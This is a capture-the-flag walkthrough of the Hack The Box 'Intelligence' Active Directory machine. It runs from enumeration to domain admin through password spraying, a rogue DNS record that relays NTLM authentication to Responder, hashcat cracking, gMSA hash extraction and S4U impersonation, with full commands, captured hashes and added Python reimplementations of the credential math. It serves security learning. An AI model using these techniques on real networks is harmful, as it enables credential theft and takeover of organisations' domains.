Hack The Box – Intelligence

Link: https://app.hackthebox.eu/machines/357

Uncredentialed Enumeration

TCP Port Scan

tcp port scan with version detection

Our initial port scan reveals 10 open ports, including SMB, a web server, LDAP, DNS and Kerberos: the usual profile of an Active Directory domain controller.

SMB Share

smbclient -L 10.129.122.188 lets us connect anonymously (a null session), but no shares are listed. I also tried nmap with --script=smb-enum-* and --script=smb-vuln-*; only --script=smb2* returned anything useful.

Mainly the SMB2 security mode: message signing is enabled and required. That is worth remembering for later, because signing required on a host rules out relaying captured NTLM authentication to its SMB service.

smbmap fails to provide useful results.

LDAP Enumeration

I attempted to use a Python script for enumeration, but without credentials it fails to bind.

DNS Enumeration

Attempting to use tools such as nslookup, dnsenum and dnsrecon failed to provide useful results.

Web Server

Navigating to the IP over port 80 serves a standard Bootstrap template page. There is a form for collecting an email address, but it is not hooked up to actually send or store anything.

A gobuster dir scan turns up a /documents directory. Directory indexing is off, so requesting it directly returns 403 Forbidden.

$ gobuster dir -u http://10.129.122.188/ -w /usr/share/wordlists/dirb/big.txt 

I also mapped the IP to intelligence.htb in /etc/hosts and ran a gobuster vhost scan for notable subdomains, using a wordlist from SecLists (https://github.com/danielmiessler/SecLists if you do not have it installed).

$ gobuster vhost -u http://intelligence.htb -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt


This search returned nothing useful.

Looking closer at the page source, everything appears to be served from the /documents directory, and two linked files follow the format yyyy-mm-dd-upload.pdf. I created a Python script to generate two years' worth of filenames in that format and ran the list through gobuster.

For the file generation:
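The author's generator script did not survive on this page. The following is an added example, not the original script, that does the same job: it emits one yyyy-mm-dd-upload.pdf name per calendar day for an assumed two-year window, 2020-01-01 to 2021-12-31 (the exact window the author used is not stated; both filenames seen in the page source fall in 2020), and writes the list to dates.txt for gobuster to consume with -w.

```python
from datetime import date, timedelta


def daterange_names(start_iso, end_iso, suffix="-upload.pdf"):
    """Return one 'yyyy-mm-dd<suffix>' entry per calendar day from start to end inclusive.

    date arithmetic handles month lengths and leap days, so the list contains
    2020-02-29 but never 2021-02-29, which a naive nested loop over 1..31 would emit
    (and which would only add dead requests to the scan).
    """
    day = date.fromisoformat(start_iso)
    end = date.fromisoformat(end_iso)
    names = []
    while day <= end:
        names.append(day.isoformat() + suffix)
        day += timedelta(days=1)
    return names


def write_wordlist(names, path):
    """Write the names one per line, the format gobuster expects for -w."""
    with open(path, "w", encoding="ascii") as fh:
        fh.write("\n".join(names) + "\n")
    return len(names)


if __name__ == "__main__":
    # Assumed window (not stated on the page): two calendar years covering the observed 2020 files.
    wordlist = daterange_names("2020-01-01", "2021-12-31")
    count = write_wordlist(wordlist, "dates.txt")
    print(f"wrote {count} candidate filenames to dates.txt")
```

The two years produce 731 candidates; gobuster only reports the ones the server answers with 200, which is how the 95 real documents fall out of the noise.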

Now for gobuster:

$ gobuster dir -u http://10.129.122.188/documents -w /home/kali/htb/dates.txt -e > docs.txt

This scan reveals 95 PDF files, many of which are just Lorem Ipsum text, but a few are noteworthy:


2020-12-30-upload.pdf

Internal IT Update
There has recently been some outages on our web servers. Ted has gotten a script in place to help notify us if this happens again. Also, after discussion following our recent security audit we are in the process of locking down our service accounts.

2020-06-04-upload.pdf

New Account Guide
Welcome to Intelligence Corp!
Please login using your username and the default password of:
NewIntelligenceCorpUser9876

After logging in please change your password as soon as possible.

Using the output from gobuster, I cleaned the results up to one URL per line and used wget to grab all the files, then pulled the author field out of each PDF's metadata:

cd ~/Downloads/docs
wget -i ~/docs.txt
strings 202* | grep /Creator

After deduplicating the grep output we are left with 30 unique accounts, and the first.last format looks exactly like the sAMAccountNames an AD domain would use:

 /Creator (William.Lee)
 /Creator (Scott.Scott)
 /Creator (Jason.Wright)
 /Creator (Veronica.Patel)
 /Creator (Jennifer.Thomas)
 /Creator (Danny.Matthews)
 /Creator (David.Reed)
 /Creator (Stephanie.Young)
 /Creator (Daniel.Shelton)
 /Creator (Jose.Williams)
 /Creator (John.Coleman)
 /Creator (Brian.Morris)
 /Creator (Thomas.Valenzuela)
 /Creator (Travis.Evans)
 /Creator (Samuel.Richardson)
 /Creator (Richard.Williams)
 /Creator (David.Mcbride)
 /Creator (Anita.Roberts)
 /Creator (Brian.Baker)
 /Creator (Kelly.Long)
 /Creator (Nicole.Brock)
 /Creator (Kaitlyn.Zimmerman)
 /Creator (Jason.Patterson)
 /Creator (Darryl.Harris)
 /Creator (David.Wilson)
 /Creator (Teresa.Williamson)
 /Creator (Ian.Duncan)
 /Creator (Jessica.Moody)
 /Creator (Tiffany.Molina)
 /Creator (Thomas.Hall)
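strings and grep do the job, but as an added example (not the author's tooling) here is the same extraction in Python: it pulls /Creator out of each PDF's Info dictionary, handles both literal (...) and hex <...> PDF strings, deduplicates while preserving order, and runs against a few constructed stand-in PDFs embedded in the script rather than the real documents.

```python
import re
from pathlib import Path

# /Creator (literal string): a backslash escapes the next byte, so '\)' does not end the string
LITERAL = re.compile(rb"/Creator\s*\(((?:\\.|[^\\)])*)\)")
# /Creator <hex string>: whitespace inside the angle brackets is allowed by the PDF spec
HEXSTR = re.compile(rb"/Creator\s*<([0-9A-Fa-f\s]*)>")


def decode_pdf_string(raw):
    """PDF text strings are UTF-16BE when they start with a BOM, otherwise PDFDocEncoding
    (latin-1 is close enough for ASCII usernames)."""
    if raw.startswith(b"\xfe\xff"):
        return raw[2:].decode("utf-16-be")
    return raw.decode("latin-1")


def pdf_creator(data):
    """Return the /Creator value of one PDF (as bytes), or None if the key is absent."""
    m = LITERAL.search(data)
    if m:
        # undo the escapes that matter for names; a full parser would also handle \n, \ddd, ...
        raw = m.group(1).replace(rb"\(", b"(").replace(rb"\)", b")").replace(rb"\\", b"\\")
        return decode_pdf_string(raw)
    m = HEXSTR.search(data)
    if m:
        return decode_pdf_string(bytes.fromhex(m.group(1).decode("ascii")))
    return None


def unique_creators(pdf_blobs):
    """Deduplicate while keeping first-seen order (sort -u would lose the order)."""
    seen = []
    for data in pdf_blobs:
        name = pdf_creator(data)
        if name and name not in seen:
            seen.append(name)
    return seen


def creators_from_dir(directory):
    """Run over every *.pdf in a directory, e.g. the one wget -i filled."""
    return unique_creators(p.read_bytes() for p in sorted(Path(directory).glob("*.pdf")))


def _hex_string(text):
    """Build a BOM-prefixed UTF-16BE PDF hex string, as some producers write metadata."""
    return b"<" + ("\ufeff" + text).encode("utf-16-be").hex().encode("ascii") + b">"


# Constructed stand-ins (not the real documents): only the Info dictionary matters here.
SAMPLE_PDFS = [
    b"%PDF-1.4\n1 0 obj\n<< /Creator (William.Lee) /Producer (LibreOffice) >>\nendobj\n",
    b"%PDF-1.4\n1 0 obj\n<< /Creator (Scott.Scott) >>\nendobj\n",
    b"%PDF-1.4\n1 0 obj\n<< /Creator (William.Lee) >>\nendobj\n",  # duplicate author
    b"%PDF-1.4\n1 0 obj\n<< /Creator " + _hex_string("Jason.Wright") + b" >>\nendobj\n",
    b"%PDF-1.4\n1 0 obj\n<< /Producer (no creator here) >>\nendobj\n",
]

if __name__ == "__main__":
    for user in unique_creators(SAMPLE_PDFS):
        print(user)
```

Point creators_from_dir at the download directory to get the same 30 names as the grep above; the hex-string case is the one strings | grep /Creator silently misses.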

Spraying the default password NewIntelligenceCorpUser9876 across this list (one password against every account, which stays well under any lockout threshold) finally gives a hit:

  • Tiffany.Molina | NewIntelligenceCorpUser9876

Credentialed Enumeration

SMB Enumeration

With our first set of credentials, we can use tools such as smbmap to get more information.

$ smbmap -p NewIntelligenceCorpUser9876 -H 10.129.122.188 -u Tiffany.Molina -R 

This command recursively lists all files in shares that we have read access to.

Notably, we have read access to:

  • the IT share, which contains a downdetector.ps1 script
  • the Users share, which contains Administrator, Ted.Graves and Tiffany.Molina profile folders
  • Users\Tiffany.Molina\Desktop, which holds our user.txt flag

Our access is read-only everywhere; nothing is writable.

We can get access to the user flag with:

$ smbmap -p NewIntelligenceCorpUser9876 -H 10.129.122.188 -u Tiffany.Molina --download Users/Tiffany.Molina/Desktop/user.txt 

I used the same command to grab the downdetector.ps1 file which has the following contents:

# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory 
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*")  {
 try {
  $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
  if($request.StatusCode -ne 200) {
    Send-MailMessage -From 'Ted Graves [email protected]' -To 'Ted Graves [email protected]' -Subject "Host: $($record.Name) is down"
  }
 } 
 catch {}
}

The script runs every 5 minutes, enumerates the AD-integrated DNS zone for every record whose name starts with web, requests http://<name>/ with -UseDefaultCredentials (that is, authenticating as whatever account the scheduled task runs under) and emails Ted.Graves when the response is anything other than 200. The -UseDefaultCredentials flag is the weakness: whoever controls a web* DNS record receives the task account's NTLM authentication, and by default any authenticated domain user can create records in an AD-integrated DNS zone.

LDAP Enumeration

I reused the python script from earlier with credentials to get information on ldap:

$ python3 ad-ldap-enum.py -d intelligence.htb -l 10.129.122.188 -u Tiffany.Molina -p NewIntelligenceCorpUser9876

This script drops a few .tsv files that tell us which users are in which groups. The rows that matter for us:

dba            Jeremy.Mora              NORMAL DONT_EXPIRE_PASSWORD 
itsupport      Ted.Graves               NORMAL DONT_EXPIRE_PASSWORD 
itsupport      Laura.Lee                NORMAL DONT_EXPIRE_PASSWORD 
sysadmin       Jason.Patterson          NORMAL DONT_EXPIRE_PASSWORD 
Domain Users   Administrator            NORMAL DONT_EXPIRE_PASSWORD 
Domain Guests  Guest           DISABLED NORMAL DONT_EXPIRE_PASSWORD 
Domain Users   krbtgt          DISABLED NORMAL DONT_EXPIRE_PASSWORD 
...
Domain Users   Tiffany.Molina           NORMAL DONT_EXPIRE_PASSWORD 

The operating system is reported as Windows Server 2019 Datacenter 10.0 (17763).

I also installed JXplorer and bound with Tiffany.Molina's credentials for a GUI way of browsing the directory, but I did not find anything of use on any of the users.

Capture the Hash

Our current account is a plain domain user with read-only access, so we need another account to pivot to. The PowerShell script we found queries AD DNS for hosts whose names start with web and then requests each one with the credentials of the account the task runs as (-UseDefaultCredentials). If we register such a record pointing at our machine and listen with Responder, we capture that account's NetNTLMv2 response.

Phase 1 is adding a DNS record whose name starts with web and which points back to our attacking machine. dnstool.py from dirkjanm's krbrelayx (https://github.com/dirkjanm/krbrelayx) does this over LDAP with ordinary domain-user credentials:

Our attacking IP is the one ending in xxx.

$ python3 dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p NewIntelligenceCorpUser9876 -a add -r web123.intelligence.htb -d 10.10.14.xxx 10.129.122.188

Phase 2 is starting Responder to catch the authentication. -A (analyze mode) disables LLMNR/NBT-NS poisoning; the rogue HTTP server still listens, which is all we need because our DNS record already sends the request to us.

$ sudo responder -I tun0 -A

Now we wait for the scheduled task to run, at most 5 minutes, and we get a hit!

[HTTP] NTLMv2 Client   : 10.129.122.188
[HTTP] NTLMv2 Username : intelligence\Ted.Graves
[HTTP] NTLMv2 Hash     : Ted.Graves::intelligence:8a9face4ef7cdc7b:EB65005B0492CBA111472146584E5F65:0101000000000000201FB8A9F89DD701789418BC2F40E95C00000...00000000000000000000900380048005400540050002F007700650062003100320033002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000 

What Responder logged is a NetNTLMv2 challenge-response, not the NT hash itself: the 32-hex-character NTProofStr after the server challenge (8a9face4ef7cdc7b) is an HMAC-MD5, keyed from the NT hash, over that challenge and a client blob that carries a timestamp, a client nonce and the target name (the trailing UTF-16 hex spells out HTTP/web123.intelligence.htb). Every capture is therefore bound to this one exchange, so it cannot be replayed or used for pass-the-hash; the options are to crack it offline against a wordlist or to relay it live, and with SMB signing required on the DC, cracking is the route here.

I copied the hash line and echoed it into hash.txt. From hashcat's mode list, NetNTLMv2 is -m 5600:

$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt -o hash_cracked.txt

After a few moments the cracked password appears in hash_cracked.txt.
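As an added example (not the author's, Responder's or hashcat's code), here is the structure of that hash line and the check hashcat performs for every candidate: the blob is decoded into its timestamp, client nonce and AV_PAIRs (the target name HTTP/web123.intelligence.htb sits in there), and NTProofStr is recomputed from a candidate NT hash as HMAC-MD5 over the server challenge and blob. Because the page's blob is truncated, the script builds a constructed capture with a known key (the NT hash of "password") and the server challenge, client nonce and target name seen above; the key and the timestamp are constructed and are not Ted's.

```python
import hmac
import hashlib
import struct
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
AV_NAMES = {1: "MsvAvNbComputerName", 2: "MsvAvNbDomainName", 3: "MsvAvDnsComputerName",
            4: "MsvAvDnsDomainName", 5: "MsvAvDnsTreeName", 6: "MsvAvFlags", 7: "MsvAvTimestamp",
            8: "MsvAvSingleHost", 9: "MsvAvTargetName", 10: "MsvChannelBindings"}
UTF16_AV = {1, 2, 3, 4, 5, 9}  # the AV_PAIR ids whose values are UTF-16LE strings


def filetime_to_datetime(raw):
    """8-byte little-endian FILETIME (100 ns ticks since 1601-01-01 UTC) -> aware datetime."""
    ticks, = struct.unpack("<Q", raw)
    return FILETIME_EPOCH + timedelta(microseconds=ticks // 10)


def datetime_to_filetime(when):
    delta = when - FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * 10**7 + delta.microseconds * 10


def parse_hashcat_5600(line):
    """USER::DOMAIN:ServerChallenge:NTProofStr:blob, which is exactly what Responder prints."""
    user, _, domain, challenge, proof, blob = line.strip().split(":")
    return {"user": user, "domain": domain, "server_challenge": bytes.fromhex(challenge),
            "proof": bytes.fromhex(proof), "blob": bytes.fromhex(blob)}


def parse_blob(blob):
    """Decode NTLMv2_CLIENT_CHALLENGE (MS-NLMP 2.2.2.7): header, timestamp, nonce, AV_PAIRs."""
    info = {"timestamp": filetime_to_datetime(blob[8:16]),
            "client_challenge": blob[16:24].hex(), "av_pairs": {}}
    pos = 28  # RespType(1) HiRespType(1) Reserved1(2) Reserved2(4) TimeStamp(8) Nonce(8) Reserved3(4)
    while pos + 4 <= len(blob):
        av_id, av_len = struct.unpack_from("<HH", blob, pos)
        pos += 4
        if av_id == 0:  # MsvAvEOL terminates the list
            break
        value = blob[pos:pos + av_len]
        pos += av_len
        info["av_pairs"][AV_NAMES.get(av_id, f"AvId{av_id}")] = (
            value.decode("utf-16-le") if av_id in UTF16_AV else value.hex())
    return info


def ntowf_v2(nt_hash, user, domain):
    """NTOWFv2 = HMAC-MD5(NT hash, UTF-16LE(UPPER(user) + domain))  (MS-NLMP 3.3.2)."""
    return hmac.new(nt_hash, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def nt_proof_str(nt_hash, user, domain, server_challenge, blob):
    """NTProofStr = HMAC-MD5(NTOWFv2, ServerChallenge || blob): bound to both nonces and the timestamp."""
    return hmac.new(ntowf_v2(nt_hash, user, domain), server_challenge + blob, hashlib.md5).digest()


def check_candidate(line, nt_hash_hex):
    """One hashcat -m 5600 guess: recompute NTProofStr from a candidate NT hash and compare."""
    h = parse_hashcat_5600(line)
    expected = nt_proof_str(bytes.fromhex(nt_hash_hex), h["user"], h["domain"],
                            h["server_challenge"], h["blob"])
    return hmac.compare_digest(expected, h["proof"])


def build_sample_capture(nt_hash_hex, user, domain, server_challenge_hex, target, when):
    """Constructed capture for offline testing: the layout Responder logged, but with a known key."""
    av = b""
    for av_id, text in ((2, domain.upper()), (9, target)):
        enc = text.encode("utf-16-le")
        av += struct.pack("<HH", av_id, len(enc)) + enc
    av += struct.pack("<HH", 0, 0)  # MsvAvEOL
    blob = (bytes([1, 1]) + b"\x00" * 6 + struct.pack("<Q", datetime_to_filetime(when))
            + bytes.fromhex("789418bc2f40e95c") + b"\x00" * 4 + av + b"\x00" * 4)
    proof = nt_proof_str(bytes.fromhex(nt_hash_hex), user, domain,
                         bytes.fromhex(server_challenge_hex), blob)
    return f"{user}::{domain}:{server_challenge_hex}:{proof.hex().upper()}:{blob.hex().upper()}"


# Constructed sample: the NT hash of "password" stands in for the unknown key; the server
# challenge, client nonce and target name are the ones visible in the capture above.
SAMPLE_NT_HASH = "8846f7eaee8fb117ad06bdd830b7586c"
SAMPLE_LINE = build_sample_capture(SAMPLE_NT_HASH, "Ted.Graves", "intelligence", "8a9face4ef7cdc7b",
                                   "HTTP/web123.intelligence.htb",
                                   datetime(2021, 8, 30, 23, 42, 15, tzinfo=timezone.utc))

if __name__ == "__main__":
    decoded = parse_blob(parse_hashcat_5600(SAMPLE_LINE)["blob"])
    print("timestamp :", decoded["timestamp"])
    print("target    :", decoded["av_pairs"]["MsvAvTargetName"])
    print("candidate 'password' matches:", check_candidate(SAMPLE_LINE, SAMPLE_NT_HASH))
```

Feeding the real line into parse_blob is enough to read the timestamp and target out of a capture without cracking it; check_candidate is the per-guess work hashcat parallelises, and the HMAC chain above is why the same password yields a different hash line on every capture.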

SMB Enumeration – Again

Now let's check what we can find with Ted.Graves' account on the shares:

$ smbmap -p ... -H 10.129.122.188 -u Ted.Graves -R

I don’t see anything of use here.

Escalation

Get NT Hash for Service Account

The note we read earlier mentioned service accounts being locked down, which hints at Group Managed Service Accounts. gMSADumper (https://github.com/micahvandeusen/gMSADumper) reads the msDS-ManagedPassword attribute of every gMSA; AD returns it only to the principals listed in msDS-GroupMSAMembership and only over an encrypted LDAP session, and the tool prints the NT hash derived from it:

$ python3 gMSADumper.py -u Ted.Graves -p ... -d intelligence.htb
Users or groups who can read password for svc_int$:
  > DC$
  > itsupport
svc_int$:::5e47bac787e5e1970cf9acdb5b316239 

This gives us the NT hash of svc_int$: Ted.Graves is in itsupport, one of the two principals allowed to read the managed password (the other is the DC's own computer account). Now we can use Impacket to turn the hash into a Kerberos ticket.
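To show where that hash comes from, here is an added example (not gMSADumper's code) that parses a constructed MSDS-MANAGEDPASSWORD_BLOB laid out as MS-ADTS 2.2.20 specifies and derives the NT hash, MD4 over the UTF-16LE password bytes, from its current-password field. MD4 is implemented in pure Python because hashlib's md4 is frequently missing on OpenSSL 3 systems. The blob, the 256-byte password and the intervals are constructed sample data, not svc_int$'s.

```python
import struct

MASK32 = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def _f(x, y, z):
    return (x & y) | (~x & z)


def _g(x, y, z):
    return (x & y) | (x & z) | (y & z)


def _h(x, y, z):
    return x ^ y ^ z


def md4(data):
    """RFC 1320 MD4: pad to 56 mod 64, append the 64-bit LE bit length, three 16-step rounds per block."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for i in range(16):  # round 1: X[0..15] in order
            a = _rotl((a + _f(b, c, d) + x[i]) & MASK32, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2: X[0,4,8,12,1,5,...]
            k = (i % 4) * 4 + i // 4
            a = _rotl((a + _g(b, c, d) + x[k] + 0x5A827999) & MASK32, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i, k in enumerate((0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)):  # round 3
            a = _rotl((a + _h(b, c, d) + x[k] + 0x6ED9EBA1) & MASK32, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        state = [(v + w) & MASK32 for v, w in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password_utf16le):
    """NT hash = MD4(UTF-16LE password) (NTOWFv1). gMSA passwords are 256 random bytes, not text."""
    return md4(password_utf16le)


def parse_managed_password_blob(blob):
    """MSDS-MANAGEDPASSWORD_BLOB (MS-ADTS 2.2.20): a 16-byte header of offsets, then the
    null-terminated UTF-16LE current/previous passwords and two 100 ns-tick intervals."""
    version, _reserved, length, cur_off, prev_off, query_off, unchanged_off = struct.unpack_from(
        "<HHIHHHH", blob, 0)
    if version != 1 or length != len(blob):
        raise ValueError("not a version-1 managed password blob")

    def utf16z(off):
        end = off
        while blob[end:end + 2] != b"\x00\x00":  # 2-byte aligned scan: 'A\x00\x00B' is not a terminator
            end += 2
        return blob[off:end]

    query_interval, = struct.unpack_from("<Q", blob, query_off)
    unchanged_interval, = struct.unpack_from("<Q", blob, unchanged_off)
    return {"current": utf16z(cur_off),
            "previous": utf16z(prev_off) if prev_off else b"",
            "query_interval_days": query_interval / 10**7 / 86400,
            "unchanged_interval_days": unchanged_interval / 10**7 / 86400}


def build_managed_password_blob(current, previous=b"", interval_days=30):
    """Constructed blob with the real layout, so the parser can be exercised without a DC."""
    body = current + b"\x00\x00"
    cur_off, prev_off = 16, 0
    if previous:
        prev_off = 16 + len(body)
        body += previous + b"\x00\x00"
    body += b"\x00" * ((-(16 + len(body))) % 8)  # align the intervals to 8 bytes
    query_off = 16 + len(body)
    unchanged_off = query_off + 8
    ticks = interval_days * 86400 * 10**7
    header = struct.pack("<HHIHHHH", 1, 0, unchanged_off + 8, cur_off, prev_off, query_off, unchanged_off)
    return header + body + struct.pack("<QQ", ticks, ticks)


def gmsa_nt_hash(blob):
    """What gMSADumper prints for svc_int$: the NT hash of the current managed password."""
    return nt_hash(parse_managed_password_blob(blob)["current"]).hex()


# Constructed 256-byte password with no 0x0000 code unit, the shape AD actually generates.
SAMPLE_PASSWORD = bytes((i % 255) + 1 for i in range(256))
SAMPLE_BLOB = build_managed_password_blob(SAMPLE_PASSWORD, previous="OldPw".encode("utf-16-le"))

if __name__ == "__main__":
    print("NT hash of 'password':", nt_hash("password".encode("utf-16-le")).hex())
    print("svc_int$-style hash  :", gmsa_nt_hash(SAMPLE_BLOB))
```

The password itself is unusable as a password (256 random bytes that no logon prompt accepts), which is why every gMSA tool hands you the NT hash instead; Kerberos with RC4 keys is exactly the NT hash, so the hash is all getST.py needs below.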

Exchange Hash for Kerberos Ticket

Impacket has a tool named getST.py that, "Given a password, hash or aesKey, it will request a Service Ticket and save it as ccache". On Kali I ran cd /opt/impacket/examples to find the script.

Looking at the options, we need the SPN of the target service to request a ticket for. Using Ted's credentials, let's look at LDAP once more. Microsoft's documentation for the ms-DS-Allowed-To-Delegate-To attribute (msDS-AllowedToDelegateTo in LDAP) tells us what to look for: it lists the SPNs an account configured for constrained delegation may request service tickets for on behalf of other users.

I fired up JXplorer, and navigated to the Managed Service Accounts section. We see the svc_int account here. Looking under the Table Editor there we can find msDS-AllowedToDelegateTo with the value we need www/dc.intelligence.htb.

Be sure to add dc.intelligence.htb to /etc/hosts now; the following commands address the DC by that name.

view in JXplorer

Now, with the SPN, we request a ticket as Administrator. -impersonate drives the constrained-delegation flow: getST first obtains a ticket to svc_int$ itself on behalf of Administrator (S4U2self), then exchanges it for a ticket to WWW/dc.intelligence.htb (S4U2proxy):

$ python3 getST.py intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -hashes :5e47bac787e5e1970cf9acdb5b316239 -impersonate Administrator
Impacket v0.9.23.dev1+20210315.121412.a16198c3 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for user
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

The clock on my Kali VM differs from the DC's by more than the 5 minutes Kerberos tolerates by default, so we need to sync them with ntpdate (ntpdate -q 10.129.122.188 shows the offset first without changing anything).

IMPORTANT NOTE: I am using Parallels on a Mac, so I had to change a Parallels setting for it to work:

Ensure time is set to Do not sync
$ sudo apt-get install ntpdate
$ sudo ntpdate 10.129.122.188
30 Aug 20:18:30 ntpdate[56371]: step time server 10.129.122.188 offset +25199.774292 sec

Now if we rerun the command above for the service ticket:

service ticket granted!

We now have a service ticket as Administrator (getST saves it as a .ccache file; point KRB5CCNAME at that file so the Impacket tools pick it up) and a couple of ways to connect. I am going to use Impacket's smbclient.py with Kerberos authentication:

$ smbclient.py -k intelligence.htb/[email protected] -dc-ip 10.129.122.188 -no-pass

Now that we are connected, a few commands take us to the Administrator's desktop:

# shares
# use C$
# cd Users
# cd Administrator
# cd Desktop
# get root.txt

It will download root.txt in whatever directory you were in when you ran the smbclient.py command. For me it was in ~/htb.

Conclusion

This machine was really difficult for me, and I learned a lot of new tools. I had done a Golden Ticket before on TryHackMe, but the process was very fuzzy, so I had to keep researching what to do next. Writing a custom script to discover and download files and build a wordlist of usernames was very cool.

This felt a lot more realistic in that we found one account but had to pivot to another, and then another, before finally getting the flag. A lot of corporations run Windows, so the experience of using Impacket to obtain a service ticket was very useful knowledge that I am sure will matter again in the future.
